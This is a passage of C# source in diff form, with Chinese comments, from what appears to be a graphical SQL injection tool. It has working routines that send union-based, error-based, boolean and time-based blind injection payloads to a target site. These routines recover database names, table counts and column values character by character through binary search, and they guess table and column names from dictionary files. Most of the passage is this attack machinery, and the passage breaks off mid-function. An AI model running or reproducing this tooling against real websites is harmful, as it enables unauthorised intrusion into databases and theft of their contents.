+ data_list.Add(MySQL5.table_value.Replace("'{dbname}'", Tools.strToHex(sn.dbname, "UTF-8")).Replace("{index}", sn.limit.ToString()));
+ String tables_value_payload = MySQL5.creatMySQLColumnsStrByUnion(config.columnsCount, config.showColumn, "1", data_list, null, null, -1);
+ String result = getOneDataByUnionOrError(MySQL5.union_value.Replace("{data}", tables_value_payload));
+
+ this.Invoke(new StringDelegate(log), "数据库" + sn.dbname + "发现表:" + result);
+ this.Invoke(new addNodeToTreeListDelegate(addNodeToTreeList), sn.tn, result, "table");
+ }
+ ///
+ /// 获取表名,多线程调用sqlserver
+ ///
+ ///
+ public void getTableNameValueByUnionBySQLServer(Object osn)
+ {
+
+ SelectNode sn = (SelectNode)osn;
+ String tables_value_payload = MSSQL.getUnionDataValue(config.columnsCount, config.showColumn, 1, MSSQL.table_value, sn.dbname, sn.tableName, sn.limit.ToString());
+ String result = getOneDataByUnionOrError(tables_value_payload);
+
+ this.Invoke(new StringDelegate(log), "数据库" + sn.dbname + "发现表:" + result);
+ this.Invoke(new addNodeToTreeListDelegate(addNodeToTreeList), sn.tn, result, "table");
+ }
+
+ ///
+ /// 获取表名,多线程调用sqlserver
+ ///
+ ///
+ public void getTableNameValueByUnionByOracle(Object osn)
+ {
+
+ SelectNode sn = (SelectNode)osn;
+ String tables_value_payload = Oracle.getUnionDataValue(config.columnsCount, config.showColumn, Oracle.table_value, sn.dbname, "", sn.limit.ToString());
+ String result = getOneDataByUnionOrError(tables_value_payload);
+
+ this.Invoke(new StringDelegate(log), "用户" + sn.dbname + "发现表:" + result);
+ this.Invoke(new addNodeToTreeListDelegate(addNodeToTreeList), sn.tn, result, "table");
+ }
+
+ public void getTableNameValueByErrorByMySQL(Object osn)
+ {
+
+ SelectNode sn = (SelectNode)osn;
+ List data_list = new List();
+ data_list.Add(MySQL5.table_value.Replace("'{dbname}'", Tools.strToHex(sn.dbname, "UTF-8")).Replace("{index}", sn.limit.ToString()));
+ String table_value_payload = MySQL5.creatMySQLColumnsStrByError(data_list, null, null, -1);
+ String result = getOneDataByUnionOrError(MySQL5.error_value.Replace("{data}", table_value_payload));
+
+ this.Invoke(new StringDelegate(log), "数据库" + sn.dbname + "发现表:" + result);
+ this.Invoke(new addNodeToTreeListDelegate(addNodeToTreeList), sn.tn, result, "table");
+ }
+
+ public void getTableNameValueByErrorBySQLServer(Object osn)
+ {
+
+ SelectNode sn = (SelectNode)osn;
+ List data_list = new List();
+ String result = getOneDataByUnionOrError(MSSQL.error_value.Replace("{data}", MSSQL.table_value.Replace("{dbname}", sn.dbname).Replace("{index}", sn.limit.ToString())));
+
+ this.Invoke(new StringDelegate(log), "数据库" + sn.dbname + "发现表:" + result);
+ this.Invoke(new addNodeToTreeListDelegate(addNodeToTreeList), sn.tn, result, "table");
+ }
+
+ public void getTableNameValueByErrorByOracle(Object osn)
+ {
+
+ SelectNode sn = (SelectNode)osn;
+ List data_list = new List();
+ String result = getOneHexDataByUnionOrError(Oracle.getErrorDataValue(Oracle.table_value, sn.dbname, "", sn.limit.ToString()));
+
+ this.Invoke(new StringDelegate(log), "数据库" + sn.dbname + "发现表:" + result);
+ this.Invoke(new addNodeToTreeListDelegate(addNodeToTreeList), sn.tn, result, "table");
+ }
+
+
+ delegate void addNodeToTreeListDelegate(TreeNode tn, String text, String type);
+
+ public void addNodeToTreeList(TreeNode tn, String text, String type)
+ {
+ TreeNode stn = new TreeNode(text);
+ stn.Tag = type;
+ if ("dbs".Equals(type))
+ {
+ stn.ImageIndex = 4;
+ }
+ else if ("table".Equals(type))
+ {
+ stn.ImageIndex = 1;
+ }
+ else if ("column".Equals(type))
+ {
+ stn.ImageIndex = 2;
+ }
+ tn.Nodes.Add(stn);
+ tn.Expand();
+ }
+
+
+ ///
+ /// 二分法判断
+ ///
+ /// 获取数据paylaod
+ /// 开始值
+ /// 最大值
+ ///
+ public int getValue(String payLoadStr, int start, int end)
+ {
+ int len = 0;
+ String payload = "";
+ int min = start;
+ int olen = 0;
+ while (status == 1)
+ {
+ //2分法获取中间数字
+ len = Tools.getLargeNum(start, end);
+ if (olen == len)
+ {
+ len = end;
+ break;
+ }
+ olen = len;
+ payload = payLoadStr.Replace("{len}", len + "");
+ ServerInfo server = HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, payload, config.request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
+ Boolean exists = Tools.isTrue(server, config.key, config.reverseKey, config.keyType);
+ if (exists)
+ {
+ if (len == start)
+ {
+ return end;
+ }
+ start = len;
+ }
+ else
+ {
+ if (len == start)
+ {
+ return len;
+ }
+ end = len;
+ }
+ }
+ return len;
+
+ }
+
+ delegate void addDBToTreeListDelegate(String dbName);
+ public void addDBToTreeList(String dbName)
+ {
+
+ TreeNode tn = new TreeNode(dbName);
+ tn.Tag = "dbs";
+ this.data_tvw_dbs.Nodes.Add(tn);
+
+ }
+
+
+ ///
+ /// 递增获取值
+ ///
+ /// 获取数据paylaod
+ /// 开始值
+ /// 最大值
+ ///
+ public int getValueByStepUp(String payLoadStr, int start, int step)
+ {
+ int len = 0;
+ int starts = start;
+ String payload = "";
+ while (status == 1)
+ {
+ payload = payLoadStr.Replace("{len}", start + "");
+ ServerInfo server = HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, payload, config.request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
+ if (Tools.isTrue(server, config.key, config.reverseKey, config.keyType))
+ {
+ start += step;
+ }
+ else
+ {
+
+ //确定范围了
+ int s = start - step;
+ if (start <= 0)
+ {
+ break;
+ }
+ else
+ {
+ len = getValue(payLoadStr, s, start);
+ break;
+ }
+ }
+ }
+ return len;
+ }
+
+ public delegate void sendHTTPLogDelegate(String index, ServerInfo server, String payload);
+
+ public void sendHTTPLog(String index, ServerInfo server, String payload)
+ {
+ ListViewItem lvi = new ListViewItem(index);
+ lvi.Tag = index;
+ lvi.SubItems.Add(payload);
+ lvi.SubItems.Add(server.runTime + "");
+ lvi.SubItems.Add(server.code + "");
+ lvi.SubItems.Add(server.length + "");
+ lvi.SubItems.Add(server.sleepTime.ToString());
+ this.log_lvw_httpLog.Items.Add(lvi);
+ }
+
+
+ public Boolean findKeyInBody(String payLoadStr, int num)
+ {
+
+ String payload = payLoadStr.Replace("{len}", num + ""); ;
+ while (status == 1)
+ {
+ ServerInfo server = null;
+ int tryCount = 0;
+ while (tryCount <= config.reTry)
+ {
+ try
+ {
+ server = HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, payload, config.request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
+ break;
+ }
+ catch (Exception e)
+ {
+ tryCount++;
+ this.Invoke(new StringDelegate(log), "发包失败!异常:" + e.Message);
+ }
+ }
+ if (server == null)
+ {
+ return false;
+ }
+
+ return Tools.isTrue(server, config.key, config.reverseKey, config.keyType);
+
+ }
+ return false;
+
+ }
+
+ public Boolean findKeyInBody(String payLoadStr)
+ {
+ while (true)
+ {
+ ServerInfo server = null;
+ int tryCount = 0;
+ while (tryCount <= config.reTry)
+ {
+ try
+ {
+ server = HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, payLoadStr, config.request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
+ break;
+ }
+ catch (Exception e)
+ {
+ tryCount++;
+ this.Invoke(new StringDelegate(log), "发包失败!异常:" + e.Message);
+ }
+ }
+ if (server == null)
+ {
+ return false;
+ }
+
+ return Tools.isTrue(server, config.key, config.reverseKey, config.keyType);
+
+ }
+
+ }
+
+ public delegate void StringDelegate(String str);
+ public void log(String log)
+ {
+ if (config.isOpenInfoLog)
+ {
+ if (this.txt_log.Left > 10000)
+ {
+ this.txt_log.Text = "";
+ }
+ this.txt_log.AppendText(@log + "----" + DateTime.Now + "\r\n"+FileTool.error);
+ }
+ }
+
+ public Boolean isSetInjectPoint()
+ {
+
+ if (this.txt_inject_request.Text.IndexOf(setInjectStr) == -1)
+ {
+ MessageBox.Show("未设置注入点!");
+ return false;
+ }
+ else
+ {
+ return true;
+ }
+
+ }
+
+
+ private void btn_inject_setInject_Click(object sender, EventArgs e)
+ {
+ this.txt_inject_request.Text = this.txt_inject_request.Text.Insert(this.txt_inject_request.SelectionStart, setInjectStr);
+ }
+
+ private void btn_inject_setEncodingRange_Click(object sender, EventArgs e)
+ {
+
+ this.txt_inject_request.SelectedText = "" + this.txt_inject_request.SelectedText + "";
+ }
+
+ AddNode an = null;
+
+ private void data_dbs_tsmi_deleteNode_Click(object sender, EventArgs e)
+ {
+ if (this.data_tvw_dbs.SelectedNode != null)
+ {
+
+ this.data_tvw_dbs.SelectedNode.Remove();
+ }
+ }
+ public void getDBSByError(DBType dbType)
+ {
+ //获取数据库数量
+ List data_list = new List();
+ String db_Count_data = "";
+ String result = "";
+ int db_len = 0;
+ switch (dbType)
+ {
+ case DBType.Access:
+ MessageBox.Show("抱歉Access数据库,不支持错误显示注入!");
+ break;
+ case DBType.MySQL4:
+ MessageBox.Show("抱歉MySQL4数据库,不支持错误显示注入!");
+ break;
+ case DBType.MySQL5:
+
+ data_list.Add(MySQL5.dbs_count);
+ db_Count_data = MySQL5.creatMySQLColumnsStrByError(data_list, null, null, -1);
+ result = getOneDataByUnionOrError(MySQL5.error_value.Replace("{data}", db_Count_data));
+ this.Invoke(new StringDelegate(log), "报告大侠,我发现了" + result + "个数据库!");
+ db_len = Tools.convertToInt(result);
+ this.dbsCount = db_len;
+ if (db_len > 0)
+ {
+ for (int j = 0; j < db_len; j++)
+ {
+ //获取对应的数据库
+
+ MyThreadPool.initThread(new ParameterizedThreadStart(getDBNameByErrorByMySQL), j);
+ }
+
+ }
+ else
+ {
+ MessageBox.Show("没有发现数据库,奇怪了!");
+ }
+ break;
+ case DBType.SQLServer:
+ //获取数据库数量
+ result = getOneDataByUnionOrError(MSSQL.error_value.Replace("{data}", MSSQL.dbs_count));
+ this.Invoke(new StringDelegate(log), "报告大侠,我发现了" + result + "个数据库!");
+ db_len = Tools.convertToInt(result);
+ this.dbsCount = db_len;
+ if (db_len > 0)
+ {
+ //注意这里db_name()下标从1开始
+ for (int j = 1; j <= db_len; j++)
+ {
+ //获取对应的数据库
+ MyThreadPool.initThread(new ParameterizedThreadStart(getDBNameByErrorBySQLServer), j);
+ }
+
+ }
+ else
+ {
+ MessageBox.Show("没有发现数据库,奇怪了!");
+ }
+ break;
+ case DBType.Oracle:
+ //获取数据库数量
+ result = getOneHexDataByUnionOrError(Oracle.getErrorDataValue(Oracle.dbs_count, "", "", ""));
+ this.Invoke(new StringDelegate(log), "报告大侠,我发现了" + result + "个数据库用户!");
+ db_len = Tools.convertToInt(result);
+ this.dbsCount = db_len;
+ if (db_len > 0)
+ {
+ //下标从1开始
+ for (int j = 1; j <= db_len; j++)
+ {
+ //获取对应的数据库
+ MyThreadPool.initThread(new ParameterizedThreadStart(getDBNameByErrorByOracle), j);
+ }
+
+ }
+ else
+ {
+ MessageBox.Show("没有发现数据库,奇怪了!");
+ }
+ break;
+ }
+
+ }
+ public void getDBSByUnion(DBType dbType)
+ {
+ List data_list = new List();
+ String db_Count_data = "";
+ String result = "";
+ int db_len = 0;
+ switch (dbType)
+ {
+ case DBType.Access:
+ break;
+ case DBType.MySQL4:
+ break;
+ case DBType.MySQL5:
+ //获取数据库数量
+ data_list.Add(MySQL5.dbs_count);
+ db_Count_data = MySQL5.creatMySQLColumnsStrByUnion(config.columnsCount, config.showColumn, "1", data_list, null, null, -1);
+ result = getOneDataByUnionOrError(MySQL5.union_value.Replace("{data}", db_Count_data));
+
+ this.Invoke(new StringDelegate(log), "报告大侠,我发现了" + result + "个数据库!");
+ db_len = Tools.convertToInt(result);
+ this.dbsCount = db_len;
+ if (db_len > 0)
+ {
+ for (int j = 0; j < db_len; j++)
+ {
+ //获取对应的数据库
+ MyThreadPool.initThread(new ParameterizedThreadStart(getDBNameByUnionByMySQL), j);
+ }
+ }
+ else
+ {
+ MessageBox.Show("没有发现数据库,奇怪了!");
+ }
+ break;
+ case DBType.SQLServer:
+ //获取数据库数量
+ result = getOneDataByUnionOrError(MSSQL.getUnionDataValue(config.columnsCount, config.showColumn, 1, MSSQL.dbs_count));
+
+ this.Invoke(new StringDelegate(log), "报告大侠,我发现了" + result + "个数据库!");
+ db_len = Tools.convertToInt(result);
+ this.dbsCount = db_len;
+ if (db_len > 0)
+ {
+ for (int j = 1; j <= db_len; j++)
+ {
+ //获取对应的数据库
+ MyThreadPool.initThread(new ParameterizedThreadStart(getDBNameByUnionBySQLServer), j);
+ }
+ }
+ else
+ {
+ MessageBox.Show("没有发现数据库,奇怪了!");
+ }
+ break;
+ case DBType.Oracle:
+ //获取数据库数量
+ result = getOneDataByUnionOrError(Oracle.getUnionDataValue(config.columnsCount, config.showColumn, Oracle.dbs_count, "", "", ""));
+
+ this.Invoke(new StringDelegate(log), "报告大侠,我发现了" + result + "个数据库用户!");
+ db_len = Tools.convertToInt(result);
+ this.dbsCount = db_len;
+ if (db_len > 0)
+ {
+ for (int j = 1; j <= db_len; j++)
+ {
+ //获取对应的数据库
+ MyThreadPool.initThread(new ParameterizedThreadStart(getDBNameByUnionByOracle), j);
+ }
+ }
+ else
+ {
+ MessageBox.Show("没有发现数据库,奇怪了!");
+ }
+ break;
+ }
+
+ }
+ public void getDBSByBool(DBType dbType)
+ {
+ int db_len = 0;
+ switch (dbType)
+ {
+
+ case DBType.Access:
+ MessageBox.Show("Access数据库没有库!");
+ break;
+ case DBType.MySQL4:
+
+ break;
+ case DBType.MySQL5:
+ //获取数据库数量
+ if (KeyType.Time.Equals(config.keyType))
+ {
+ db_len = getValueByStepUp(MySQL5.getBoolCountBySleep(MySQL5.dbs_count, config.maxTime), 0, 10);
+ }
+ else
+ {
+ db_len = getValueByStepUp(MySQL5.bool_db_count, 0, 10);
+ }
+
+ this.Invoke(new StringDelegate(log), "报告大侠,我发现了" + db_len + "个数据库!");
+ this.dbsCount = db_len;
+ if (db_len > 0)
+ {
+ for (int j = 0; j < db_len; j++)
+ {
+ //获取对应的数据库
+ MyThreadPool.initThread(new ParameterizedThreadStart(getDBNameByBoolByMySQL), j);
+ }
+
+ }
+ else
+ {
+ MessageBox.Show("没有发现数据库,奇怪了!");
+ }
+ break;
+ case DBType.SQLServer:
+ db_len = getValueByStepUp(MSSQL.bool_db_count, 0, 10);
+ this.Invoke(new StringDelegate(log), "报告大侠,我发现了" + db_len + "个数据库!");
+ this.dbsCount = db_len;
+ if (db_len > 0)
+ {
+ for (int j = 1; j <= db_len; j++)
+ {
+ //获取对应的数据库
+ MyThreadPool.initThread(new ParameterizedThreadStart(getDBNameByBoolBySQLServer), j);
+ }
+
+ }
+ else
+ {
+ MessageBox.Show("没有发现数据库,奇怪了!");
+ }
+ break;
+ case DBType.Oracle:
+ db_len = getValueByStepUp(Oracle.bool_db_count, 0, 10);
+ this.Invoke(new StringDelegate(log), "报告大侠,我发现了" + db_len + "个数据库!");
+ this.dbsCount = db_len;
+ if (db_len > 0)
+ {
+ //db下标从1开始
+ for (int j = 1; j <= db_len; j++)
+ {
+ //获取对应的数据库
+ MyThreadPool.initThread(new ParameterizedThreadStart(getDBNameByBoolByOracle), j);
+ }
+
+ }
+ else
+ {
+ MessageBox.Show("没有发现数据库,奇怪了!");
+ }
+ break;
+ }
+ }
+
+ public void checkTableIsExis(object osn)
+ {
+ SelectNode sn = (SelectNode)osn;
+ String payload = String.Format(Comm.exists_table, sn.tableName);
+ bool findKey = findKeyInBody(payload);
+ if (findKey)
+ {
+ this.Invoke(new showLogDelegate(log), "发现表:" + sn.tableName);
+ this.Invoke(new addNodeToTreeListDelegate(addNodeToTreeList), sn.tn, sn.tableName, "table");
+ }
+
+ }
+
+ public void checkColumnIsExis(object osn)
+ {
+ SelectNode sn = (SelectNode)osn;
+ String payload = String.Format(Comm.exists_column, sn.columnName, sn.tableName);
+ bool findKey = findKeyInBody(payload);
+ if (findKey)
+ {
+ this.Invoke(new showLogDelegate(log), "表" + sn.tableName + "发现列:" + sn.columnName);
+ this.Invoke(new addNodeToTreeListDelegate(addNodeToTreeList), sn.tn, sn.columnName, "column");
+ }
+
+ }
+
+
+ public void checkTablesDic(TreeNode tn)
+ {
+
+ //加载字典
+ List dirs = FileTool.readAllDic("config/tables/");
+ foreach (String fpath in dirs)
+ {
+ if (status != 1) break;
+ this.Invoke(new StringDelegate(log), "正在使用字典" + fpath + "进行盲猜!");
+ List tables = FileTool.readFileToList("config/tables/" + fpath);
+ comm_count = tables.Count;
+ for (int i = 0; i < tables.Count; i++)
+ {
+ SelectNode sn = new SelectNode();
+ sn.tableName = tables[i];
+ sn.tn = tn;
+ MyThreadPool.initThread(new ParameterizedThreadStart(checkTableIsExis), sn);
+ comm_currentCount = i + 1;
+ }
+ }
+
+ }
+
+ public void checkColumnsDic(TreeNode tn)
+ {
+
+ //加载字典
+ List dirs = FileTool.readAllDic("config/columns/");
+ foreach (String fpath in dirs)
+ {
+ if (status != 1) break;
+ this.Invoke(new StringDelegate(log), "正在使用字典" + fpath + "进行盲猜!");
+ List columns = FileTool.readFileToList("config/columns/" + fpath);
+ comm_count = columns.Count;
+ for (int i = 0; i < columns.Count; i++)
+ {
+ SelectNode sn = new SelectNode();
+ sn.columnName = columns[i];
+ sn.tableName = tn.Text;
+ sn.tn = tn;
+ MyThreadPool.initThread(new ParameterizedThreadStart(checkColumnIsExis), sn);
+ comm_currentCount = i + 1;
+ }
+ }
+
+ }
+
+ ///
+ /// bool方式获取表明
+ ///
+ /// 数据库节点
+ public void getTabeleNameByBool(DBType dbType, TreeNode tn)
+ {
+ //获取当前数据库长度
+ String dbname = tn.Text;
+ int table_count = 0;
+ switch (dbType)
+ {
+
+ case DBType.Access:
+ if (String.IsNullOrEmpty(config.key))
+ {
+ MessageBox.Show(ErrorMessage.access_no_key);
+ return;
+ }
+ checkTablesDic(tn);
+ break;
+ case DBType.MySQL4:
+
+ break;
+ case DBType.MySQL5:
+ //获取当前数据库长度
+
+ if (config.keyType.Equals(KeyType.Time))
+ {
+ table_count = getValueByStepUp(MySQL5.getBoolCountBySleep(MySQL5.tables_count.Replace("'{dbname}'", Tools.strToHex(dbname, "UTF-8")), config.maxTime), 0, 50);
+ }
+ else
+ {
+ table_count = getValueByStepUp(MySQL5.bool_tables_count.Replace("'{dbname}'", Tools.strToHex(dbname, "UTF-8")), 0, 50);
+ }
+
+ this.Invoke(new StringDelegate(log), "报告大侠,数据库" + dbname + "发现" + table_count + "个表!");
+ for (int i = 0; i < table_count; i++)
+ {
+ SelectNode sn = new SelectNode();
+ sn.tn = tn;
+ sn.limit = i;
+ sn.dbname = dbname;
+ MyThreadPool.initThread(new ParameterizedThreadStart(getTableNameValueByBoolByMySQL), sn);
+ }
+ break;
+ case DBType.SQLServer:
+ table_count = getValueByStepUp(MSSQL.bool_tables_count.Replace("{dbname}", dbname), 0, 50);
+ this.Invoke(new StringDelegate(log), "报告大侠,数据库" + dbname + "发现" + table_count + "个表!");
+ for (int i = 0; i < table_count; i++)
+ {
+ SelectNode sn = new SelectNode();
+ sn.tn = tn;
+ sn.limit = i;
+ sn.dbname = dbname;
+ MyThreadPool.initThread(new ParameterizedThreadStart(getTableNameValueByBoolBySQLServer), sn);
+ }
+ break;
+ case DBType.Oracle:
+ //获取当前数据库长度
+ table_count = getValueByStepUp(Oracle.bool_tables_count.Replace("{dbname}", dbname), 0, 50);
+ this.Invoke(new StringDelegate(log), "报告大侠,数据库" + dbname + "发现" + table_count + "个表!");
+ for (int i = 1; i <= table_count; i++)
+ {
+ SelectNode sn = new SelectNode();
+ sn.tn = tn;
+ sn.limit = i;
+ sn.dbname = dbname;
+ MyThreadPool.initThread(new ParameterizedThreadStart(getTableNameValueByBoolByOracle), sn);
+ }
+ break;
+ }
+
+ }
+ ///
+ /// union方式获取表名
+ ///
+ public void getTabeleNameByUnion(DBType dbType, TreeNode tn)
+ {
+ String dbName = tn.Text;
+ List data_list = new List();
+ String tables_count_payload = "";
+ String result = "";
+ int table_count = 0;
+ switch (dbType)
+ {
+
+ case DBType.Access:
+ if (String.IsNullOrEmpty(config.key))
+ {
+ MessageBox.Show(ErrorMessage.access_no_key);
+ return;
+ }
+ checkTablesDic(tn);
+ break;
+ case DBType.MySQL4:
+
+ break;
+ case DBType.MySQL5:
+ //获取当前数据库表数量
+ data_list.Add(MySQL5.tables_count.Replace("'{dbname}'", Tools.strToHex(dbName, "UTF-8")));
+ tables_count_payload = MySQL5.creatMySQLColumnsStrByUnion(config.columnsCount, config.showColumn, "1", data_list, null, null, -1);
+ result = getOneDataByUnionOrError(MySQL5.union_value.Replace("{data}", tables_count_payload));
+
+ this.Invoke(new StringDelegate(log), "报告大侠,数据库" + dbName + "有" + Tools.convertToInt(result) + "个表!");
+ table_count = Tools.convertToInt(result);
+ this.tableCount = table_count;
+ for (int i = 0; i < table_count; i++)
+ {
+ SelectNode sn = new SelectNode();
+ sn.tn = tn;
+ sn.limit = i;
+ sn.dbname = dbName;
+ MyThreadPool.initThread(new ParameterizedThreadStart(getTableNameValueByUnionByMySQL), sn);
+ }
+ break;
+ case DBType.SQLServer:
+ //获取当前数据库表数量
+ tables_count_payload = MSSQL.getUnionDataValue(config.columnsCount, config.showColumn, 1, MSSQL.tables_count, dbName, "", "");
+ result = getOneDataByUnionOrError(tables_count_payload);
+
+ this.Invoke(new StringDelegate(log), "报告大侠,数据库" + dbName + "有" + Tools.convertToInt(result) + "个表!");
+ table_count = Tools.convertToInt(result);
+ this.tableCount = table_count;
+ for (int i = 0; i < table_count; i++)
+ {
+ SelectNode sn = new SelectNode();
+ sn.tn = tn;
+ sn.limit = i;
+ sn.dbname = dbName;
+ MyThreadPool.initThread(new ParameterizedThreadStart(getTableNameValueByUnionBySQLServer), sn);
+ }
+ break;
+ case DBType.Oracle:
+ //获取当前数据库表数量
+ tables_count_payload = Oracle.getUnionDataValue(config.columnsCount, config.showColumn, Oracle.tables_count, dbName, "", "");
+ result = getOneDataByUnionOrError(tables_count_payload);
+
+ this.Invoke(new StringDelegate(log), "报告大侠,用户" + dbName + "有" + Tools.convertToInt(result) + "个表!");
+ table_count = Tools.convertToInt(result);
+ this.tableCount = table_count;
+ //下标1开始
+ for (int i = 1; i <= table_count; i++)
+ {
+ SelectNode sn = new SelectNode();
+ sn.tn = tn;
+ sn.limit = i;
+ sn.dbname = dbName;
+ MyThreadPool.initThread(new ParameterizedThreadStart(getTableNameValueByUnionByOracle), sn);
+ }
+ break;
+ }
+ }
+
+ ///
+ /// Error方式获取
+ ///
+ public void getTabeleNameByError(DBType dbType, TreeNode tn)
+ {
+ //获取数据库数量
+ String dbName = tn.Text;
+ List data_list = new List();
+ String tables_count_payload = "";
+ String result = "";
+ int table_count = 0;
+ switch (dbType)
+ {
+ case DBType.Access:
+ MessageBox.Show("抱歉Access数据库不支持错误显示注入!");
+ break;
+ case DBType.MySQL4:
+ MessageBox.Show("抱歉MySQL4数据库,不支持错误显示注入!");
+ break;
+ case DBType.MySQL5:
+ //获取当前数据库表长度
+ data_list.Add(MySQL5.tables_count.Replace("'{dbname}'", Tools.strToHex(dbName, "UTF-8")));
+ tables_count_payload = MySQL5.creatMySQLColumnsStrByError(data_list, null, null, -1);
+ result = getOneDataByUnionOrError(MySQL5.error_value.Replace("{data}", tables_count_payload));
+
+ this.Invoke(new StringDelegate(log), "报告大侠,数据库" + dbName + "有" + Tools.convertToInt(result) + "个表!");
+ table_count = Tools.convertToInt(result);
+ this.tableCount = table_count;
+ for (int i = 0; i < table_count; i++)
+ {
+ SelectNode sn = new SelectNode();
+ sn.tn = tn;
+ sn.limit = i;
+ sn.dbname = dbName;
+ MyThreadPool.initThread(new ParameterizedThreadStart(getTableNameValueByErrorByMySQL), sn);
+ }
+ break;
+ case DBType.SQLServer:
+ //获取当前数据库表长度
+ result = getOneDataByUnionOrError(MSSQL.error_value.Replace("{data}", MSSQL.tables_count.Replace("{dbname}", dbName)));
+ //HTML解码
+ result = HttpUtility.HtmlDecode(result);
+ this.Invoke(new StringDelegate(log), "报告大侠,数据库" + dbName + "有" + Tools.convertToInt(result) + "个表!");
+ table_count = Tools.convertToInt(result);
+ this.tableCount = table_count;
+ for (int i = 0; i < table_count; i++)
+ {
+ SelectNode sn = new SelectNode();
+ sn.tn = tn;
+ sn.limit = i;
+ sn.dbname = dbName;
+ MyThreadPool.initThread(new ParameterizedThreadStart(getTableNameValueByErrorBySQLServer), sn);
+ }
+ break;
+ case DBType.Oracle:
+ //获取当前数据库表长度
+ result = getOneHexDataByUnionOrError(Oracle.getErrorDataValue(Oracle.tables_count, dbName, "", ""));
+
+ this.Invoke(new StringDelegate(log), "报告大侠,数据库" + dbName + "有" + Tools.convertToInt(result) + "个表!");
+ table_count = Tools.convertToInt(result);
+ this.tableCount = table_count;
+ for (int i = 1; i <= table_count; i++)
+ {
+ SelectNode sn = new SelectNode();
+ sn.tn = tn;
+ sn.limit = i;
+ sn.dbname = dbName;
+ MyThreadPool.initThread(new ParameterizedThreadStart(getTableNameValueByErrorByOracle), sn);
+ }
+ break;
+ }
+ }
+
+ ///
+ /// 获取数据库列表
+ ///
+ public void getDBS()
+ {
+
+ switch (config.injectType)
+ {
+ case InjectType.Bool:
+ getDBSByBool(config.dbType);
+ break;
+
+ case InjectType.Union:
+ getDBSByUnion(config.dbType);
+ break;
+ case InjectType.Error:
+ getDBSByError(config.dbType);
+ break;
+ case InjectType.Sleep:
+ getDBSByBool(config.dbType);
+ break;
+
+ }
+ }
+ private void data_dbs_tsl_getDBS_Click(object sender, EventArgs e)
+ {
+ if (MyThreadPool.GetAliveThreadsCount() == 0)
+ {
+ //获取环境变量
+ this.data_tvw_dbs.Nodes.Clear();
+ if (this.cbox_basic_dbType.Text.Equals("Access"))
+ {
+ addDBToTreeList("Access");
+ }
+ //检查注入配置
+ if (checkConfig())
+ {
+ //判断是否标记注入点
+ if (isSetInjectPoint())
+ {
+ status = 1;
+ this.currentThread = new Thread(getDBS);
+ this.currentThread.Start();
+ }
+
+ }
+ }
+ else
+ {
+
+ MessageBox.Show("还有线程未结束,请稍后....");
+
+ }
+
+ }
+
+ ///
+ /// 获取当前数据库下的表
+ ///
+ /// 当前数据库的TreeNode节点
+ public void getTables(Object otn)
+ {
+ if (checkConfig())
+ {
+ if (isSetInjectPoint())
+ {
+ switch (config.injectType)
+ {
+ case InjectType.Bool:
+ getTabeleNameByBool(config.dbType, (TreeNode)otn);
+ break;
+ case InjectType.Union:
+ getTabeleNameByUnion(config.dbType, (TreeNode)otn);
+ break;
+ case InjectType.Error:
+ getTabeleNameByError(config.dbType, (TreeNode)otn);
+ break;
+ case InjectType.Sleep:
+ getDBSByBool(config.dbType);
+ break;
+ }
+ }
+ else
+ {
+ MessageBox.Show("请标记注入点!");
+ }
+ }
+ else
+ {
+ MessageBox.Show("配置不完整,请检注入查配置!");
+ }
+ }
+
+ private void data_dbs_tsl_getTables_Click(object sender, EventArgs e)
+ {
+ foreach (TreeNode tn in this.data_tvw_dbs.Nodes)
+ {
+ if (tn.Checked && "dbs".Equals(tn.Tag))
+ {
+ if (MyThreadPool.GetAliveThreadsCount() == 0)
+ {
+ tn.Nodes.Clear();
+ status = 1;
+ this.currentThread = new Thread(new ParameterizedThreadStart(getTables));
+ this.currentThread.Start(tn);
+ }
+ else
+ {
+ MessageBox.Show("还有线程未结束,请稍后....");
+ }
+ }
+ }
+ }
+
+ ///
+ /// 获取列明称,bool方式
+ ///
+ /// 表的节点
+ public void getColumnNameByBoolByMySQL(Object osn)
+ {
+
+ try
+ {
+ SelectNode sn = (SelectNode)osn;
+ //判断当前表长度
+ String data_payload = MySQL5.column_value.Replace("'{table}'", Tools.strToHex(sn.tableName, "UTF-8")).Replace("{index}", sn.limit + "").Replace("'{dbname}'", Tools.strToHex(sn.dbname, "UTF-8"));
+ int len = 0;
+ if (KeyType.Time.Equals(config.keyType))
+ {
+ len = getValue(MySQL5.getBoolCountBySleep(MySQL5.bool_length.Replace("{data}", data_payload), config.maxTime), 1, 50);
+ }
+ else
+ {
+
+ len = getValue(MySQL5.ver_length.Replace("{data}", data_payload), 1, 50);
+ }
+
+ //判断当前数据库对应的ascii码
+ String va_payload = MySQL5.ver_value.Replace("{data}", data_payload);
+ if (KeyType.Time.Equals(config.keyType))
+ {
+ va_payload = MySQL5.getBoolCountBySleep(MySQL5.bool_value.Replace("{data}", data_payload), config.maxTime);
+ }
+ String value = "";
+ //获取值
+ for (int i = 1; i <= len; i++)
+ {
+ //取值payload,替换对应下标值
+ String tmp_va_payload = va_payload.Replace("{index}", i + "");
+ int ascii = getValue(tmp_va_payload, 0, 128);
+ value += ((char)ascii).ToString();
+ }
+ this.Invoke(new StringDelegate(log), "表" + sn.tableName + "发现列:" + value);
+ this.Invoke(new addNodeToTreeListDelegate(addNodeToTreeList), sn.tn, value, "column");
+
+ }
+ catch (Exception e)
+ {
+
+ this.Invoke(new StringDelegate(log), "获取值发生异常:" + e.Message);
+ }
+ }
+
+ ///
+ /// 获取列名称,bool方式
+ ///
+ /// 表的节点
+ public void getColumnNameByBoolBySQLServer(Object osn)
+ {
+
+ try
+ {
+ SelectNode sn = (SelectNode)osn;
+ String data_payload = MSSQL.column_value.Replace("{index}", sn.limit.ToString()).Replace("{dbname}", sn.dbname).Replace("{table}", sn.tableName);
+ int len = getValueByStepUp(MSSQL.bool_length.Replace("{data}", data_payload), 0, 10);
+ String value = "";
+ //获取值
+ for (int i = 1; i <= len; i++)
+ {
+ //取值payload,替换对应下标值
+ //select UNICODE(substring(@@version,{index},1))
+ //取值payload,替换对应下标值
